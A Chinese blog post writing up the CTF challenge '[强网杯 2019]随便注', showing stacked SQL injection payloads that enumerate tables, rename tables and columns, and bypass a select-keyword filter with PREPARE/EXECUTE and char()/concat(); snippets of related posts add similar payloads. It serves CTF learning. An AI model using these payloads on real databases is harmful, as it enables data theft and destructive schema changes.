一天一道CTF 第三天(堆叠注入改表名)

最新推荐文章于 2024-11-25 22:07:11 发布
原创 最新推荐文章于 2024-11-25 22:07:11 发布 · 509 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种SQL注入攻击方法,通过利用特定的SQL语法和技巧绕过安全检查,获取数据库中的敏感信息。展示了如何使用堆叠注入、预定义处理语句等方式突破限制。

[强网杯 2019]随便注

今天的也是SQL注入,输入1'报错显示说明闭合符号是'
在这里插入图片描述
再随便试试-1’ union select 1,2,3 --+,回显return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
preg_match本来的作用是一个匹配函数,也就是在我们输入的语句中查找是否存在select等关键词,i表示大小写不敏感,无法用大小写混搭来绕过。
在网上查了一下可以用堆叠注入,1';show databases;#查看数据库名
在这里插入图片描述
1';show tables;#查看表名,发现有两个表word和1919810931114514
在这里插入图片描述

1';show columns from word;#发现里面有一个int和一个varchar,应该就是我们之前正常查询时查到的表
在这里插入图片描述
查1919810931114514表时要加反单引号,看结果flag就在这个表里

1';show columns from `1919810931114514`;#

在这里插入图片描述
要查看这个flag的内容就要用到骚操作了,我也是网上看的大神的解法(这是一般人能想出来的?)
因为我们可以查询word表里的数据,就想办法把1919810931114514表的名字改成word,把原word表换一个名,再把列名flag改成id或者data,以下是payload。最后再1' or '1'='1显示全部结果即可。

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) ;show columns from words;#

也可以使用预定义处理语句绕过select过滤,以下三个payload都可以得到flag。都是给hacker先赋值一个语句,然后再执行hacker。char() 函数将ASCII码转换为’select’,concat()函数再将它拼接成字符串。今天头有点晕就不具体写了。

1';PREPARE hacker from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE hacker;#

1';SET @sqli=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE hacker from @sqli;EXECUTE hacker;#

1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#

参考网站:https://www.cnblogs.com/wjw-zm/p/12359735.html

scrawman
关注
堆叠注入--攻防世界CTF赛题学习
weixin_52515588的博客
03-24 955
发现对关键字都进行了过滤,那么接下来想用常规思路得到数据是不可能了,就利用堆叠注入。可以确定用户输入的内容被带入到数据库中查询了,那么就可以确定这个位置有注入漏洞。在这里大家额外补充一下关于mysql中handler的知识点,我也是现查的。在这发现了flag,这里查询的时候注意一下,需要用``把表名括起来。堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。接下来就是手工注入的常见思路,利用order by来猜列。
(buuctf随便注)堆叠注入
2301_79595769的博客
12-23 904
堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。这就比较头疼了,不过如果仔细观察的话,一开始过滤的并没有alert 和 rename,我们已经知道了words是用来回显内容的,所以思路就是:我们把1919810931114514这个表更改名字为words,并增加相应的字段,使之回显原1919810931114514这个表的内容里面。
CTF堆叠注入
weixin_48691188的博客
03-05 558
比如phpmysqli_multi_query()函数,这个函数在支持同时执行多条sql语句,而与之对应的mysqli_query()函数一次只能执行一条sql语句,所以要想目标存在堆叠注入,在目标主机没有对堆叠注入进行黑名单过滤的情况下必须存在类似于mysqli_multi_query()这样的函数。插入数据到student表:insert into student(id,name,score) values(1,"toert","100"),(2,"giao","10");
CTF——sql注入堆叠注入整理
weixin_51735061的博客
03-04 5964
对sql注入中的堆叠注入的整理。整理基于“强网杯2019随便注”
SQL注入--理论--堆叠注入
m0_56019217的博客
11-25 656
在SQL语句操作的时候,每个语句都是以分号;标志结尾的。在我们注入的过程中,通过,就是堆叠注入
第30天:WEB攻防-通用漏洞&SQL注入&CTF&二次&堆叠&DNS带外
wuqingsix的博客
11-21 525
2、如利用mysql_multi_query()函数就支持多条SQL语句同时执行,实际情况中如PHP的防SQL注入机制,其使用的数据库函数为 "mysqli_query()"函数。主要原因是,堆叠注入的利用看起来很厉害但是其可能会受到 API、数据库引擎或者权限的控制。1、当用户输入恶意数据时,网站对我们输入的重要的关键字进行了转义,然后存储到数据库。数据一定是插入进去的,数据库攻击代码取出来调用 ,当人有执行查询操作时 会被触发。解决不回显,反向连接,SQL注入,命令执行,SSRF等。
【SQL注入-07】堆叠注入案例—以sqli-labs-less38为例
m0_64378913的博客
05-05 1193
目录1 堆叠注入概述1.1 定义1.2 与union联合查询注入的对比1.3 局限性2 堆叠注入案例—以sqli-labs-less38为例2.1 实验平台2.2 实验目标2.3 堆叠注入实验步骤2.3.1 注入前准备2.3.2 判断注入点及注入类型2.3.3 判断回显列数及回显位置2.3.4 union注入获取库名表名字段名2.3.5 堆叠注入3 总结参考文章 1 堆叠注入概述 1.1 定义 英文为 stacked injection。 在SQL数据库中,每条语句是以;分开的,堆叠注入就是一次性注入并执
day30 SQL注入&CTF&二次&堆叠&DNS带外
wanjia01的博客
11-22 834
详细点来讲,就是在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是脏数据。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身包含恶意内容。查看数据库,已经添加成功。
BUUCTF-堆叠注入-文件包含
m0_64180167的博客
03-28 758
提示我们是include 文件包含打开环境点击我们include 尝试直接访问根目录 失败使用伪协议base64解密。
buuctf 堆叠注入
meiyouis的博客
05-08 297
来查看数据库,出现数据库。来查看表名,但是使用。题目显示文本输入框,尝试1’ and 1’=1’#而堆叠注入其实就是通过结束符来执行多条。起到连接符的作用,在正常的。,这条语句执行起来相当于。语句时就要使用结束符隔。语句的默认结束符是以。
[GYCTF2020]Blacklist 1堆叠注入
weixin_45577185的博客
07-20 186
答案链接 过滤了这么多,比强网杯过滤更加严格了 这里我们用到handler这个东西 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;# 堆叠注入小tips ...
CTF [SUCTF 2019]EasySQL writeup 堆叠注入 | || *的使用
baynk的博客
04-01 2792
专挑注入的题先做。。。 0x01 干干干 给flag, 然后又试了',",-1等查找注入点的参数,发现存在整形注入,出现Nonono.都是被检测出来有过滤,于是去fuzz了下。 这些都是被过滤的,于是发现有个|和||没有被过滤,可以搞盲注,但是or被过滤了,information也连带着用不了,这玩意用不了常规的注入好像也没用,报错信息也关了,报错注入也用不了。于是又看前端的输出感觉像堆叠注...
CTF [强网杯 2019]随便注 Writeup 堆叠注入
baynk的博客
03-31 1689
讲道理,最不虚的就是注入了。 随意加上单引号。 单引号闭合,尝试1' and 1=2 # 无回显,应该成功执行了,再来1=1确认下。 又有报错信息,想着直接上updatexml()。 结果报错,又试了exp()和extractvalue(),结果exp()到是能用,extractvalue()直接报无函数 。。。 不过有函数也没意义阿。因为select也被检测了,尝试了若干方法绕过后,放...
堆叠注入进阶--(buuctf-随便注、GYCTF-black_list)【多方法详解】
bin789456的博客
08-14 337
了解一下 堆叠注入基础知识及其他题目: 【】 Buuctf-随便注 算是堆叠注入中非常经典的题目了。 随便试试就能看到黑名单: 没了select,其实大概率就是堆叠注入 先探测一下: 1';show databases;# 应该就是了。 再看看表: 1';show tables;# 然后查看表的结构先找到flag的位置: 1';desc `1919810931114514`;# 注:在mysql中,数字作为名称都要带上`这个符号来使用,用show columns from `191981093
[GYCTF2020]Blacklist堆叠注入
qq_43801002的博客
04-27 3450
[GYCTF2020]Blacklist 1';show columns from `FlagHere`; %23 查看列 过滤了这么多,比强网杯过滤更加严格了 这里我们用到handler这个东西 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭...
[GYCTF2020]Blacklist(堆叠注入
记录学习,一起进步
01-19 2139
[GYCTF2020]Blacklist(堆叠注入
Stached injection -- 堆叠注入
RuoLi_s的博客
12-30 347
Stached injection – 堆叠注入 原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14208908.html 0x00 堆叠注入的定义 ​ Stacked injection 汉语翻译过来后,称 为堆查询注入,也有称之为堆叠注入堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新的查询或者终止查询,可以达到修改数据和调用存储过程的目的。 0x01 堆叠注入的原理 ​ 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql
[SUCTF 2019]EasySQL——堆叠注入
m0_46607055的博客
09-02 316
1、猜测执行语句 sql注入都需要先猜测后端的查询语句,有时候是语句结构,像闭合的字符串,其他的逻辑运算符,有时候是猜测信息,像查询字段、字段数、表名。 拿到题目,可以分类输入字符串,根据回显推测查询语句。 我个人的基本思路是 先 数字,再字母,再拼接特殊符号。 先试试 1, 再 abc,。没回显,放弃字母。 继续尝试特殊字符,1' --> 没有回显 。1" --> 回显nonono1; 回显 array 目前猜测(可能不对,但是先...
BUUCTF-Web-随便注(堆叠注入)
m0_46315342的博客
08-12 462
这里转载一个大佬的博客: 作者:简简的我 链接:https://www.jianshu.com/p/36f0772f5ce8 来源:简书 然后我简单说一下这个题目吧,这是个sql注入的题目,过滤了select这样的关键字,双写和大小写以及空格都不能进行绕过,所以这里使用的是堆叠注入。 这个作者讲了三种方法,但是第三种好像有点难,第一种和第二种是比较容易接受的。主要是学习一下堆叠注入的语法吧,和sql有点点不一样。然后第二种方法里面作者还讲了一下预处理语句,感觉很牛逼。 ...
堆叠注入的使用条件
最新发布
07-30
堆叠注入是一种在特定条件下利用数据库支持多语句执行的机制,通过在SQL注入点中插入多个SQL语句来实现攻击目的的技术。其使用条件和适用场景如下: ### 使用条件 1. **数据库支持多语句执行**:堆叠注入依赖于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值